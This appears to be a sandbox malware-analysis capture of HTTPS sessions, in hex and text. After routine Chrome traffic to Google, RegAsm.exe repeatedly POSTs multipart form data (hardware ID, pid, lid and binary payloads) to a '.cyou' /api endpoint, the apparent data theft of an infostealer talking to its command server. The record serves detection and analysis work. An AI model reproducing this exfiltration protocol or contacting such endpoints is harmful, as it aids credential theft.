                                                                                                                                                                                                              2024-11-07 16:55:20 UTC1255INData Raw: 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 30 30 33 64 74 68 69 73 3b 5c 6e 74 72 79 7b 5c 6e 5f 2e 49 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 21 61 2e 6a 29 69 66 28 63 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 29 66 6f 72 28 76 61 72 20 64 20 6f 66 20 63 29 5f 2e 49 64 28 61 2c 62 2c 64 29 3b 65 6c 73 65 7b 64 5c 75 30 30 33 64 28 30 2c 5f 2e 7a 29 28 61 2e 43 2c 61 2c 62 29 3b 63 6f 6e 73 74 20 65 5c 75 30 30 33 64 61 2e 76 2b 63 3b 61 2e 76 2b 2b 3b 62 2e 64 61 74 61 73 65 74 2e 65 71 69 64 5c 75 30
                                                                                                                                                                                                              Data Ascii: safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(function(_){var window\u003dthis;\ntry{\n_.Id\u003dfunction(a,b,c){if(!a.j)if(c instanceof Array)for(var d of c)_.Id(a,b,d);else{d\u003d(0,_.z)(a.C,a,b);const e\u003da.v+c;a.v++;b.dataset.eqid\u0
                                                                                                                                                                                                              2024-11-07 16:55:20 UTC1255INData Raw: 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 7d 7d 3b 5f 2e 54 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 53 64 28 5c 22 61 62 6f 75 74 3a 69 6e 76 61 6c 69 64 23 7a 43 6c 6f 73 75 72 65 7a 5c 22 29 3b 5f 2e 50 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 6a 68 5c 75 30 30 33 64 61 7d 7d 3b 5f 2e 55 64 5c 75 30 30 33 64 5b 51 64 28 5c 22 64 61 74 61 5c 22 29 2c 51 64 28 5c 22 68 74 74 70 5c 22 29 2c 51 64 28 5c 22 68 74 74 70 73 5c 22 29 2c 51 64 28 5c 22 6d 61 69 6c 74 6f 5c 22 29 2c 51 64 28 5c 22 66 74 70 5c 22 29 2c 6e 65 77 20 5f 2e 50 64 28 61 5c 75 30 30 33 64 5c 75 30 30 33 65 2f 5e 5b 5e 3a 5d 2a 28 5b 2f 3f 23 5d 7c 24 29 2f 2e 74 65 73 74 28 61 29 29 5d 3b 5f 2e 56 64 5c 75 30 30 33 64 63 6c 61 73
                                                                                                                                                                                                              Data Ascii: {return this.i}};_.Td\u003dnew _.Sd(\"about:invalid#zClosurez\");_.Pd\u003dclass{constructor(a){this.jh\u003da}};_.Ud\u003d[Qd(\"data\"),Qd(\"http\"),Qd(\"https\"),Qd(\"mailto\"),Qd(\"ftp\"),new _.Pd(a\u003d\u003e/^[^:]*([/?#]|$)/.test(a))];_.Vd\u003dclas
                                                                                                                                                                                                              2024-11-07 16:55:20 UTC1255INData Raw: 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 67 65 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 69 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28 63 5c 75 30 30 33 64 5c 22 64 6f 63 75 6d 65 6e 74 5c 22 69 6e 20 62 3f 62 2e 64 6f 63 75 6d 65 6e 74 3a 62 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 63 2c 60 24 7b 61 7d 5b 6e 6f 6e 63 65 5d 60 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 5c 22 5c 22 3a 62 2e 6e 6f 6e 63 65 7c
                                                                                                                                                                                                              Data Ascii: ;else throw Error(\"F\");else a\u003d_.ge(a);return a};_.ie\u003dfunction(a,b\u003ddocument){let c,d;b\u003d(d\u003d(c\u003d\"document\"in b?b.document:b).querySelector)\u003d\u003dnull?void 0:d.call(c,`${a}[nonce]`);return b\u003d\u003dnull?\"\":b.nonce|
                                                                                                                                                                                                              2024-11-07 16:55:20 UTC297INData Raw: 79 53 65 6c 65 63 74 6f 72 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 75 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 47 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 63 6c 61 73 73
                                                                                                                                                                                                              Data Ascii: ySelector(a?\".\"+a:\"\"):(b\u003db||c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]||null));return a||null};\n_.ue\u003dfunction(a,b){_.Gb(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003dc:d\u003d\u003d\"class


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              4192.168.11.2049718142.251.35.1644431664C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-11-07 16:55:20 UTC553OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                              Host: www.google.com
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
                                                                                                                                                                                                              2024-11-07 16:55:20 UTC957INHTTP/1.1 200 OK
                                                                                                                                                                                                              Version: 691321546
                                                                                                                                                                                                              Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                              Permissions-Policy: unload=()
                                                                                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                              Date: Thu, 07 Nov 2024 16:55:20 GMT
                                                                                                                                                                                                              Server: gws
                                                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              2024-11-07 16:55:20 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                              Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                              2024-11-07 16:55:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              5192.168.11.2049720104.21.19.1774431752C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-11-07 16:55:21 UTC291OUTPOST /api HTTP/1.1
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=U3PWMHQNRFFR3RVVVVVVVVVVVVVVV
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                              Content-Length: 767
                                                                                                                                                                                                              Host: knifedxejsu.cyou
                                                                                                                                                                                                              2024-11-07 16:55:21 UTC767OUTData Raw: 2d 2d 55 33 50 57 4d 48 51 4e 52 46 46 52 33 52 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 31 43 31 31 41 37 31 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 55 33 50 57 4d 48 51 4e 52 46 46 52 33 52 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 55 33 50 57 4d 48 51 4e 52 46 46 52 33 52 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d
                                                                                                                                                                                                              Data Ascii: --U3PWMHQNRFFR3RVVVVVVVVVVVVVVVContent-Disposition: form-data; name="hwid"61C11A71B129FD4CDB71E32F12885CB3--U3PWMHQNRFFR3RVVVVVVVVVVVVVVVContent-Disposition: form-data; name="pid"1--U3PWMHQNRFFR3RVVVVVVVVVVVVVVVContent-Disposition: form-
                                                                                                                                                                                                              2024-11-07 16:55:22 UTC1008INHTTP/1.1 200 OK
                                                                                                                                                                                                              Date: Thu, 07 Nov 2024 16:55:22 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: PHPSESSID=r69f6arbuiuvp4p1mcsdi27iln; expires=Mon, 03-Mar-2025 10:42:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XTI07B9MqXkiBzIjLyStPLzySdq6fh%2F5X3HZfwdUzfAvAOAoUJwg20%2FQu4vSfybBJhOpeeCMbmIjhRjnxRT9w7KHIf5r5zM%2FjBpcwC7lu7D4GAyoi06yfTNqm4RRRxQUvwSH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8deed9b87aa64295-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=102476&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1694&delivery_rate=37327&cwnd=252&unsent_bytes=0&cid=23c9ac9357466c5c&ts=805&x=0"
                                                                                                                                                                                                              2024-11-07 16:55:22 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 35 36 2e 31 34 36 2e 33 36 2e 32 30 38 0d 0a
                                                                                                                                                                                                              Data Ascii: 11ok 156.146.36.208
                                                                                                                                                                                                              2024-11-07 16:55:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              6192.168.11.2049724104.21.19.1774431752C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-11-07 16:55:22 UTC284OUTPOST /api HTTP/1.1
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=7HSJ6MZNJNF7RVVVVVVV
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                              Content-Length: 21273
                                                                                                                                                                                                              Host: knifedxejsu.cyou
                                                                                                                                                                                                              2024-11-07 16:55:22 UTC15331OUTData Raw: 2d 2d 37 48 53 4a 36 4d 5a 4e 4a 4e 46 37 52 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 31 43 31 31 41 37 31 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 37 48 53 4a 36 4d 5a 4e 4a 4e 46 37 52 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 37 48 53 4a 36 4d 5a 4e 4a 4e 46 37 52 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d
                                                                                                                                                                                                              Data Ascii: --7HSJ6MZNJNF7RVVVVVVVContent-Disposition: form-data; name="hwid"61C11A71B129FD4CDB71E32F12885CB3--7HSJ6MZNJNF7RVVVVVVVContent-Disposition: form-data; name="pid"2--7HSJ6MZNJNF7RVVVVVVVContent-Disposition: form-data; name="lid"HpOoIh-
                                                                                                                                                                                                              2024-11-07 16:55:22 UTC5942OUTData Raw: d8 0c 28 33 70 29 ab 36 a1 5f 5a 8c ed d0 a6 b9 de a8 ad cc 8e af 6e 56 3d 57 26 a6 6a 69 34 5c a7 1d a8 e3 95 cb c4 89 da 1b ad d2 14 59 55 cf 60 f1 e9 71 51 b5 12 21 17 6b 72 d5 32 74 b5 16 23 63 28 34 d4 0a 8d ad a4 c7 26 d7 37 80 5b f6 42 56 54 15 c3 25 b6 c9 22 a5 89 e9 a4 50 af b0 7c 85 d3 e7 10 c5 56 b7 99 13 8d 9e c6 52 55 6c a5 12 9b a5 58 ff 76 80 b1 be 26 d9 93 69 4d 8a 44 e8 e7 65 57 77 f4 78 cd 4b 81 3e 4a b6 55 91 69 61 d6 64 a5 aa c7 09 ea 8e ac a8 ae be 4b e2 3c 1d 57 b1 a9 06 68 82 d4 9d 78 bd 4b c4 a4 95 46 3d 42 f3 52 89 a6 c6 b3 7b 4b e5 eb af 9c 13 c4 b9 39 be 3e 1b 32 e8 db 65 52 3a d6 f1 9b 31 86 7c bb 4d 51 27 1a f1 4d b0 59 9d e7 b8 cc 78 2a bb 2f 00 5e 14 5c ff 07 00 00 00 d2 07 f6 ff 01 00 00 80 f4 91 63 1f 18 ff 01 00 00 80 54
                                                                                                                                                                                                              Data Ascii: (3p)6_ZnV=W&ji4\YU`qQ!kr2t#c(4&7[BVT%"P|VRUlXv&iMDeWwxK>JUiadK<WhxKF=BR{K9>2eR:1|MQ'MYx*/^\cT
                                                                                                                                                                                                              2024-11-07 16:55:23 UTC1015INHTTP/1.1 200 OK
                                                                                                                                                                                                              Date: Thu, 07 Nov 2024 16:55:23 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: PHPSESSID=glg04p93p49bgadja43vbkfvml; expires=Mon, 03-Mar-2025 10:42:01 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gg0KQgbN2wtobttnP4VvBdJ66LieAjFKs6EpYiJnumNk%2FBTWXHDk%2BhyFr1kkKxI87x0m5N0FldlfYqm1WDs%2Bs6VyUOz0DPxtBswbk%2F530Kb9IRblOEroLR9%2FHqsgrgl6rai9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8deed9be4cdf7c9f-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=102640&sent=10&recv=24&lost=0&retrans=0&sent_bytes=2839&recv_bytes=22237&delivery_rate=37347&cwnd=249&unsent_bytes=0&cid=6b4cc454af5b601d&ts=518&x=0"
                                                                                                                                                                                                              2024-11-07 16:55:23 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 35 36 2e 31 34 36 2e 33 36 2e 32 30 38 0d 0a
                                                                                                                                                                                                              Data Ascii: 11ok 156.146.36.208
                                                                                                                                                                                                              2024-11-07 16:55:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              7192.168.11.2049725104.21.19.1774431752C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-11-07 16:55:23 UTC291OUTPOST /api HTTP/1.1
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=003ECS8VBNZVNRVVVVVVVVVVVVV
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                              Content-Length: 10994
                                                                                                                                                                                                              Host: knifedxejsu.cyou
                                                                                                                                                                                                              2024-11-07 16:55:23 UTC10994OUTData Raw: 2d 2d 30 30 33 45 43 53 38 56 42 4e 5a 56 4e 52 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 31 43 31 31 41 37 31 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 30 30 33 45 43 53 38 56 42 4e 5a 56 4e 52 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 30 33 45 43 53 38 56 42 4e 5a 56 4e 52 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20
                                                                                                                                                                                                              Data Ascii: --003ECS8VBNZVNRVVVVVVVVVVVVVContent-Disposition: form-data; name="hwid"61C11A71B129FD4CDB71E32F12885CB3--003ECS8VBNZVNRVVVVVVVVVVVVVContent-Disposition: form-data; name="pid"2--003ECS8VBNZVNRVVVVVVVVVVVVVContent-Disposition: form-data;
                                                                                                                                                                                                              2024-11-07 16:55:24 UTC1013INHTTP/1.1 200 OK
                                                                                                                                                                                                              Date: Thu, 07 Nov 2024 16:55:24 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: PHPSESSID=11pq06g1kt0ak6nt282b6ml5j6; expires=Mon, 03-Mar-2025 10:42:02 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=11HrER19Uc8XqCJLxug2F%2BItzXYyZwju0%2FGmYgFVBYSvMGoZQD52KdphMfDvlQGOlQKY5bADlPhh8YE%2FdIwmrqZPxrYRskza45nwQqCd1wlPrKHuWgCDlOiPu7dmBZu%2FFHID"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8deed9c2fa560f7c-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=102513&sent=10&recv=16&lost=0&retrans=0&sent_bytes=2840&recv_bytes=11943&delivery_rate=37451&cwnd=252&unsent_bytes=0&cid=6a99d2834dc27429&ts=821&x=0"
                                                                                                                                                                                                              2024-11-07 16:55:24 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 35 36 2e 31 34 36 2e 33 36 2e 32 30 38 0d 0a
                                                                                                                                                                                                              Data Ascii: 11ok 156.146.36.208
                                                                                                                                                                                                              2024-11-07 16:55:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              8192.168.11.2049727104.21.19.1774431752C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-11-07 16:55:24 UTC292OUTPOST /api HTTP/1.1
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=X1Z1QA7ZN7F7RVVVVVVVVVVVVVVV
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                              Content-Length: 20629
                                                                                                                                                                                                              Host: knifedxejsu.cyou
                                                                                                                                                                                                              2024-11-07 16:55:24 UTC15331OUTData Raw: 2d 2d 58 31 5a 31 51 41 37 5a 4e 37 46 37 52 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 31 43 31 31 41 37 31 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 58 31 5a 31 51 41 37 5a 4e 37 46 37 52 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 58 31 5a 31 51 41 37 5a 4e 37 46 37 52 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74
                                                                                                                                                                                                              Data Ascii: --X1Z1QA7ZN7F7RVVVVVVVVVVVVVVVContent-Disposition: form-data; name="hwid"61C11A71B129FD4CDB71E32F12885CB3--X1Z1QA7ZN7F7RVVVVVVVVVVVVVVVContent-Disposition: form-data; name="pid"3--X1Z1QA7ZN7F7RVVVVVVVVVVVVVVVContent-Disposition: form-dat
                                                                                                                                                                                                              2024-11-07 16:55:24 UTC5298OUTData Raw: 53 74 3f d3 eb 7e 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 7a a3 c3 f4 ba ef 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 4d d1 61 7a dd 77 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 5c 6f 74 98 5e f7 dd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a b7 29 3a 4c af fb 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d eb 8d 0e d3 eb be 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 36 45 87 e9 75 df 0d 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                              Data Ascii: St?~DXzMazw\ot^:):Ln`X6Eu
                                                                                                                                                                                                              2024-11-07 16:55:25 UTC1013INHTTP/1.1 200 OK
                                                                                                                                                                                                              Date: Thu, 07 Nov 2024 16:55:25 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: PHPSESSID=ss8ftsnhgul7m5fhbo7a84vlqp; expires=Mon, 03-Mar-2025 10:42:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
